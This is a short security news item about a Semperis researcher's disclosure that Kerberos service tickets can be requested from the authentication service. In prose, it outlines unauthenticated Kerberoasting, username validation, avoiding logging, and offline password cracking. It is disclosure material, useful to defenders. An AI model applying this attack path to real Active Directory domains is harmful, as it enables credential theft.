Actu
Semperis uncovers a new attack path - AS requested service tickets
September 2022 by Semperis
Semperis, a pioneer in indentity security is revealing a vulnerability that could open a path to Kerberoasting or other attacks.
Security researcher at Semperis, Charlie Clark has demonstrated that it is possible to request service tickets (STs) from the authentication service (AS).
The ability to request STs from the AS has several consequences, including new attack paths, detection bypasses, and potential weakening of security controls.
These issues were reported to Microsoft in May; Microsoft’s response was that the behaviour is ’considered to be by design.’
However, the behaviour is never required in normal operations. The ability to circumvent current detections and perform effective attacks, like Kerberoasting, from an unauthenticated position is a serious issue that should not be ignored.
The issue can lead to new attack paths and has the potential to lead to even more vulnerabilities in the future. This research, along with Microsoft’s response, demonstrates the need for continuous monitoring and proper hardening measures.
Key points from the research:
AS requested tickets (AS-REQs) for machine accounts are unarmoured. Kerberos armouring uses a ticket-granting ticket (TGT) for the device to protect authentication service exchanges with the KDC, so the computer’s authentication service exchange is not armoured. The user’s TGT is used to protect its TGS exchanges with the KDC.
In a typical Kerberos flow, the fact that a session key is issued for each ticket is an important feature for this research. The session key is passed back to the requesting account within an encrypted section of the response; the encryption key is already known to the requestor.
The part of the Kerberos flow that this post focuses on is AS-REQ/AS-REP, which is usually used to request a TGT. With Kerberos Flexible Authentication Secure Tunneling (FAST) enforced, machine accounts still sent their AS-REQs unarmoured.
Kerberoasting is a method to recover the plaintext password or NT hash for a service account, generally a user account with an SPN. When this method is used, access to the session key is not required. Only the resulting ST—or more accurately, the encrypted part of the ST, which is not secured with the requesting accounts key—is required.
A list of usernames can then be generated in several ways, including user enumeration using null sessions on a DC, generating a list of usernames using open-source intelligence (OSINT), or guessing potential usernames. Any list of potential usernames can be easily verified by sending an AS-REQ without pre-authentication. A valid username that requires pre-authentication receives a TGT.
AS-REQs without pre-authentication are not logged as a Windows event unless the account does not require pre-authentication. With the list of usernames and the username of an account that does not require pre-authentication, the attack can be launched. The resulting output can then be used to attempt offline password cracking.
